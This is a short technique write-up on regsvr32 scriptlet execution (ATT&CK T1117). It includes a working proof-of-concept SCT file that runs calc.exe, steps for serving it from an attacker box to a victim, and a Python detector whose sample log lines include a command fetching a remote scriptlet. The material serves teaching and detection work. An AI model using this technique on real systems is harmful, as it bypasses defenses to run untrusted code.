Regsvr32
ID: T1117 Tactic: Defense Evasion, Execution
This technique uses an SCT file loaded remotely.
SCT: a scriptlet file used to create a Component Object Model (COM) component. It may be written in various scripting languages such as VBScript, JavaScript, or JScript, and it runs in Windows if the Windows Script Host is installed.
A very basic SCT file that will execute calc.exe:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll
var scr = new ActiveXObject("MSScriptControl.ScriptControl");
scr.Language = "JScript";
scr.ExecuteStatement('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
scr.Eval('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
//https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspx
//Lots of hints here on further obfuscation
]]></script>
</registration>
</scriptlet>
I will host this on my Kali box using python3:
sudo python3 -m http.server 80

Now let's call it from our Victim Box.

And execute

Demo:
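From the defender's side, the invocation shown in the PoC comment (regsvr32 with /i: and scrobj.dll) stands out in process-creation logs. The following is an added example, not part of the original page: the function names and the sample command lines (including the 192.0.2.10 address) are constructed for illustration.

```python
import re

# Image name with or without a path, quotes or the .exe extension.
REGSVR32 = re.compile(r'(?:^|[\\/"\s])regsvr32(?:\.exe)?(?=["\s]|$)', re.I)
# scrobj.dll is the scriptlet runtime named in the PoC comment.
SCROBJ = re.compile(r'scrobj(?:\.dll)?(?=["\s]|$)', re.I)
# /i:<value> or -i:<value>; the value may be quoted.
I_ARG = re.compile(r'(?:^|\s)[/-]i:"?([^"\s]+)', re.I)
URL = re.compile(r'^(?:https?|ftp)://', re.I)


def classify(cmdline):
    """Return the reasons a command line looks like scriptlet execution."""
    if not REGSVR32.search(cmdline):
        return []
    reasons = []
    if SCROBJ.search(cmdline):
        reasons.append("scrobj.dll")
    match = I_ARG.search(cmdline)
    if match:
        target = match.group(1)
        if URL.match(target):
            reasons.append("remote /i: target")
        elif target.lower().endswith(".sct"):
            reasons.append("scriptlet /i: target")
    return reasons


def scan(events):
    """Return (command line, reasons) for every flagged event."""
    return [(e, r) for e in events if (r := classify(e))]


# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r'C:\Windows\System32\regsvr32.exe /s C:\Program Files\App\plugin.dll',
    r'C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll',
    r'regsvr32 /s /u /i:http://192.0.2.10/file.sct scrobj.dll',
    r'"C:\Windows\System32\regsvr32.exe" -s -u -i:"HTTP://192.0.2.10/file.sct" ScrObj.dll',
    r'C:\Windows\System32\notepad.exe C:\notes\regsvr32-usage.txt',
]

if __name__ == "__main__":
    for cmd, why in scan(SAMPLE_EVENTS):
        print(f"ALERT [{', '.join(why)}] {cmd}")
```

Matching on the command line alone misses a renamed copy of regsvr32.exe, so pair it with the original-file-name field where the log source records one.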
